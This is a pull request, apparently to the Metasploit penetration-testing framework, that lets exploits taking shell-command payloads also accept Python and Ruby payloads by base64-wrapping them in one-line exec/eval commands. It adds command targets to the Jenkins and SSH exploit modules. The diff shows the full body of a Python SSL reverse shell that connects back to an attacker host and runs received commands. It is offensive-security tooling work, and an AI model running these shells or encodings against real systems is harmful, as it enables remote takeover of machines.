### PR TITLE
Support ARCH_RUBY and ARCH_PYTHON payload conversion to ARCH_CMD

### DIFF
--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -80,6 +80,15 @@ class EncodedPayload
       Thread.current.priority = priority
     end
 
+    # If the targets arch is ARCH_CMD and the payload responds to to_command
+    # call it to convert it to a command
+    if self.reqs.include?('TargetArch')
+      if self.reqs['TargetArch'] == [ARCH_CMD] and self.pinst.respond_to?('to_command')
+        self.raw = self.pinst.to_command(self.raw)
+        self.encoded = self.pinst.to_command(self.encoded)
+      end
+    end
+
     # Return the complete payload
     return encoded
   end

--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -710,8 +710,11 @@ class Exploit < Msf::Module
     c_arch     = (target and target.arch)     ? target.arch     : (arch == []) ? nil : arch
     c_arch   ||= [ ARCH_X86 ]
     if c_arch.include?(ARCH_CMD)
-      c_arch.push(ARCH_PYTHON) unless c_arch.include?(ARCH_PYTHON)
-      c_arch.push(ARCH_RUBY) unless c_arch.include?(ARCH_RUBY)
+      c_arch = c_arch.dup
+      # some payloads support conversion to ARCH_CMD
+      ARCH_CMD_COMPATIBLE.each do |tmp_arch|
+        c_arch.push(tmp_arch) unless c_arch.include?(tmp_arch)
+      end
     end
 
     framework.payloads.each_module(

--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -533,6 +533,7 @@ class Exploit < Msf::Module
     reqs['EncoderOptions']  = payload_encoder_options(explicit_target)
     reqs['ExtendedOptions'] = payload_extended_options(explicit_target)
     reqs['Exploit']         = self
+    reqs['TargetArch']      = explicit_target.arch
 
     # Pass along the encoder don't fall through flag
     reqs['EncoderDontFallThrough'] = datastore['EncoderDontFallThrough']
@@ -705,10 +706,13 @@ class Exploit < Msf::Module
   def compatible_payloads
     payloads = []
 
-
     c_platform = (target and target.platform) ? target.platform : platform
     c_arch     = (target and target.arch)     ? target.arch     : (arch == []) ? nil : arch
     c_arch   ||= [ ARCH_X86 ]
+    if c_arch.include?(ARCH_CMD)
+      c_arch.push(ARCH_PYTHON) unless c_arch.include?(ARCH_PYTHON)
+      c_arch.push(ARCH_RUBY) unless c_arch.include?(ARCH_RUBY)
+    end
 
     framework.payloads.each_module(
       'Platform' => c_platform,
@@ -716,11 +720,18 @@ class Exploit < Msf::Module
 
       # Skip over payloads that are too big
       if ((payload_space) and
-          (framework.payloads.sizes[name]) and
-          (framework.payloads.sizes[name] > payload_space))
-        dlog("#{refname}: Skipping payload #{name} for being too large", 'core',
-          LEV_1)
-        next
+          (framework.payloads.sizes[name]))
+        # if ARCH_CMD is supported and to_command is provided, assume we'll have
+        # use it to convert the payload to a command
+        if c_arch.include?(ARCH_CMD) and mod.respond_to?('to_command')
+          payload_size = mod.to_command(mod.generate)
+        else
+          payload_size = framework.payloads.sizes[name]
+        end
+        if (payload_size > payload_space)
+          dlog("#{refname}: Skipping payload #{name} for being too large", 'core', LEV_1)
+          next
+        end
       end
 
       # Are we compatible in terms of conventions and connections and

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -6,7 +6,9 @@ module Msf::Payload::Python
   def initialize(info = {})
     super(merge_info(info,
       'Arch'        => ARCH_PYTHON,
-      'RequiredCmd' => 'python'))
+      'RequiredCmd' => 'python',
+      'PayloadType' => 'python'
+     ))
   end
 
   # convert python code to one line

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -18,7 +18,7 @@ module Msf::Payload::Python
   end
 
   def to_command(payload)
-    if (payload =~ /^import base64; exec\(base64.b64decode\('[a-zA-Z0-9+]+={0,2}'\)\)$/).nil?
+    if payload !~ /^import base64; exec\(base64.b64decode\('[a-zA-Z0-9+]+={0,2}'\)\)$/
       payload = flatten(payload)
     end
     return "python -c \"#{payload}\""

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -1,0 +1,16 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Python
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Arch'        => ARCH_PYTHON,
+      'RequiredCmd' => 'python'))
+  end
+
+  def to_command(payload)
+    return "python -c \"#{payload}\""
+  end
+
+end

--- a/lib/msf/core/payload/python.rb
+++ b/lib/msf/core/payload/python.rb
@@ -9,7 +9,18 @@ module Msf::Payload::Python
       'RequiredCmd' => 'python'))
   end
 
+  # convert python code to one line
+  def flatten(python_code)
+    # Base64 encoding is required in order to handle Python's formatting
+    # requirements in the while loop.
+    b64data = Rex::Text.encode_base64(python_code)
+    return "import base64; exec(base64.b64decode('#{b64data}'))"
+  end
+
   def to_command(payload)
+    if (payload =~ /^import base64; exec\(base64.b64decode\('[a-zA-Z0-9+]+={0,2}'\)\)$/).nil?
+      payload = flatten(payload)
+    end
     return "python -c \"#{payload}\""
   end
 

--- a/lib/msf/core/payload/ruby.rb
+++ b/lib/msf/core/payload/ruby.rb
@@ -4,7 +4,9 @@ require 'msf/core'
 module Msf::Payload::Ruby
 
   def initialize(info = {})
-    super(info)
+    super(merge_info(info,
+      'Arch'        => ARCH_RUBY,
+      'RequiredCmd' => 'ruby'))
 
     register_advanced_options(
       [
@@ -34,6 +36,10 @@ module Msf::Payload::Ruby
     end
 
     buf
+  end
+
+  def to_command(payload)
+    return "ruby -e \"#{payload}\""
   end
 
 end

--- a/lib/msf/core/payload/ruby.rb
+++ b/lib/msf/core/payload/ruby.rb
@@ -39,7 +39,8 @@ module Msf::Payload::Ruby
   end
 
   def to_command(payload)
-    return "ruby -e \"#{payload}\""
+    payload = Rex::Text.encode_base64(payload)
+    return "ruby -e \"eval('#{payload}'.unpack('m*')[0])\""
   end
 
 end

--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -113,6 +113,7 @@ ARCH_TYPES   =
   ]
 
 ARCH_ALL = ARCH_TYPES
+ARCH_CMD_COMPATIBLE = [ARCH_PYTHON, ARCH_RUBY]
 
 #
 # Endian constants

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -35,9 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'  => %w{ win linux unix },
       'Targets'		=>
         [
-          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
-          ['Linux',    {'Arch' => ARCH_X86, 'Platform' => 'linux'}],
-          ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix'}]
+          ['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
+          ['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
         ],
       'DisclosureDate' => 'Jan 18 2013',
       'DefaultTarget'  => 0))
@@ -173,7 +173,6 @@ class Metasploit3 < Msf::Exploit::Remote
       execute_cmdstager({:linemax => 2049})
     when 'unix'
       print_status("#{rhost}:#{rport} - Sending payload...")
-      vprint_status("Command: #{payload.encoded}")
       http_send_command("#{payload.encoded}")
     when 'linux'
       print_status("#{rhost}:#{rport} - Sending Linux stager...")

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -35,9 +35,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'  => %w{ win linux unix },
       'Targets'		=>
         [
-          ['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
-          ['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
-          ['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
+          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
+          ['Linux',    {'Arch' => ARCH_X86, 'Platform' => 'linux'}],
+          ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix'}]
         ],
       'DisclosureDate' => 'Jan 18 2013',
       'DefaultTarget'  => 0))
@@ -173,6 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
       execute_cmdstager({:linemax => 2049})
     when 'unix'
       print_status("#{rhost}:#{rport} - Sending payload...")
+      vprint_status("Command: #{payload.encoded}")
       http_send_command("#{payload.encoded}")
     when 'linux'
       print_status("#{rhost}:#{rport} - Sending Linux stager...")

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'BadChars' => "",
           'DisableNops' => true
         },
-      'Platform'    => %w{ linux osx },
+      'Platform'    => %w{ linux osx unix },
       'Targets'     =>
         [
           [ 'Linux x86',
@@ -60,6 +60,12 @@ class Metasploit3 < Msf::Exploit::Remote
               'Platform' => 'osx'
             },
           ],
+          [ 'Unix CMD',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix'
+            }
+          ]
         ],
       'DefaultTarget'  => 0,
       # For the CVE
@@ -125,7 +131,13 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
-    print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...")
-    execute_cmdstager({:linemax => 500})
+    case target['Arch']
+    when ARCH_CMD
+      print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Executing command...")
+      execute_command(payload.encoded)
+    else
+      print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending command stager...")
+      execute_cmdstager({:linemax => 500})
+    end
   end
 end

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/python'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -11,6 +12,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -19,11 +21,9 @@ module Metasploit3
       'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3',
       'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
       'License'       => MSF_LICENSE,
-      'Platform'      => 'python',
-      'Arch'          => ARCH_PYTHON,
+      'Platform'      => %w{ linux osx python unix win },
       'Handler'       => Msf::Handler::ReverseTcp,
       'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'python',
       'Payload'       =>
         {
           'Offsets' => { },
@@ -58,11 +58,6 @@ module Metasploit3
     cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    flatten(cmd)
   end
-
 end
-

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -22,7 +22,6 @@ module Metasploit3
       'Author'        => 'RageLtMan',
       'License'       => BSD_LICENSE,
       'Platform'      => %w{ linux osx python unix win },
-      'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::CommandShell,
       'Payload'       =>
@@ -47,18 +46,19 @@ module Metasploit3
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
     # Set up the socket
-    cmd += "import socket,subprocess,os,ssl\n"
-    cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    cmd << "import socket,subprocess,os,ssl\n"
+    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
+    cmd << "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+    cmd << "s=ssl.wrap_socket(so)\n"
     # The actual IO
-    cmd += "#{dead}=False\n"
-    cmd += "while not #{dead}:\n"
-    cmd += "\tdata=s.recv(1024)\n"
-    cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
-    cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
-    cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.send(stdout_value)\n"
-    return flatten(cmd)
+    cmd << "#{dead}=False\n"
+    cmd << "while not #{dead}:\n"
+    cmd << "\tdata=s.recv(1024)\n"
+    cmd << "\tif len(data)==0:\n\t\t#{dead} = True\n"
+    cmd << "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+    cmd << "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+    cmd << "\ts.send(stdout_value)\n"
+
+    flatten(cmd)
   end
 end

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -59,9 +59,6 @@ module Metasploit3
     cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-    cmd
+    return flatten(cmd)
   end
 end

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/python'
 require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -11,19 +12,19 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
+      'Name'          => 'Python Command Shell, Reverse TCP SSL',
       'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
       'Author'        => 'RageLtMan',
       'License'       => BSD_LICENSE,
-      'Platform'      => 'python',
+      'Platform'      => %w{ linux osx python unix win },
       'Arch'          => ARCH_PYTHON,
       'Handler'       => Msf::Handler::ReverseTcpSsl,
       'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'python',
       'Payload'       =>
         {
           'Offsets' => { },
@@ -61,8 +62,6 @@ module Metasploit3
 
     # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
     cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
     cmd
   end
 end
-

--- a/modules/payloads/singles/ruby/shell_bind_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb
@@ -21,7 +21,7 @@ module Metasploit3
       'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
       'Author'      => [ 'kris katterjohn', 'hdm' ],
       'License'     => MSF_LICENSE,
-      'Platform'    => 'ruby',
+      'Platform'    => %w{ linux osx ruby unix win },
       'Arch'        => ARCH_RUBY,
       'Handler'     => Msf::Handler::BindTcp,
       'Session'     => Msf::Sessions::CommandShell,

--- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
+++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb
@@ -21,7 +21,7 @@ module Metasploit3
       'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
       'Author'      => [ 'kris katterjohn', 'hdm' ],
       'License'     => MSF_LICENSE,
-      'Platform'    => 'ruby',
+      'Platform'    => %w{ linux osx ruby unix win },
       'Arch'        => ARCH_RUBY,
       'Handler'     => Msf::Handler::BindTcp,
       'Session'     => Msf::Sessions::CommandShell,

--- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb
@@ -21,7 +21,7 @@ module Metasploit3
       'Description' => 'Connect back and create a command shell via Ruby',
       'Author'      => [ 'kris katterjohn', 'hdm' ],
       'License'     => MSF_LICENSE,
-      'Platform'    => 'ruby',
+      'Platform'    => %w{ linux osx ruby unix win },
       'Arch'        => ARCH_RUBY,
       'Handler'     => Msf::Handler::ReverseTcp,
       'Session'     => Msf::Sessions::CommandShell,

--- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb
@@ -21,7 +21,7 @@ module Metasploit3
       'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
       'Author'      => 'RageLtMan',
       'License'     => MSF_LICENSE,
-      'Platform'    => 'ruby',
+      'Platform'    => %w{ linux osx ruby unix win },
       'Arch'        => ARCH_RUBY,
       'Handler'     => Msf::Handler::ReverseTcpSsl,
       'Session'     => Msf::Sessions::CommandShell,

--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/python'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -11,6 +12,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Stager
+  include Msf::Payload::Python
 
   def initialize(info = {})
     super(merge_info(info,
@@ -18,8 +20,7 @@ module Metasploit3
       'Description'   => 'Listen for a connection',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
-      'Platform'      => 'python',
-      'Arch'          => ARCH_PYTHON,
+      'Platform'      => %w{ linux osx python unix win },
       'Handler'       => Msf::Handler::BindTcp,
       'Stager'        => {'Payload' => ""}
     ))

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/python'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -11,6 +12,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Stager
+  include Msf::Payload::Python
 
   def initialize(info = {})
     super(merge_info(info,
@@ -18,8 +20,7 @@ module Metasploit3
       'Description'   => 'Connect back to the attacker',
       'Author'        => 'Spencer McIntyre',
       'License'       => MSF_LICENSE,
-      'Platform'      => 'python',
-      'Arch'          => ARCH_PYTHON,
+      'Platform'      => %w{ linux osx python unix win },
       'Handler'       => Msf::Handler::ReverseTcp,
       'Stager'        => {'Payload' => ""}
     ))

--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -19,7 +19,7 @@ module Metasploit3
         are 2.5 - 2.7 and 3.1 - 3.4.
       },
       'Author'        => 'Spencer McIntyre',
-      'Platform'      => 'python',
+      'Platform'      => %w{ linux osx python unix win },
       'Arch'          => ARCH_PYTHON,
       'License'       => MSF_LICENSE,
       'Session'       => Msf::Sessions::Meterpreter_Python_Python


### PR DESCRIPTION
This pull request add support for exploits that use ARCH_CMD payloads to also support ARCH_RUBY and ARCH_PYTHON payloads via a to_command conversion function provided by their respective mixins.  Both to_command functions convert the native script code to base64 and place it in an exec/eval call to avoid character restrictions.

Both the ruby and python payload mixins define their respective binary in RequiredCmd.

For Python specifically, the base64.b64decode() function should be favored over a strings decode method to eventually support Python3.x.
## Verification
- [ ] Module has a string Platform and/or Arch
- [ ] Module has an array Platform and/or Arch
- [ ] Module Target has a string Platform and/or Arch
- [ ] Module Target has an array Platform and/or Arch
- [ ] Uses appropriate encoder for BadChars (ie a Ruby or Python encoder)?
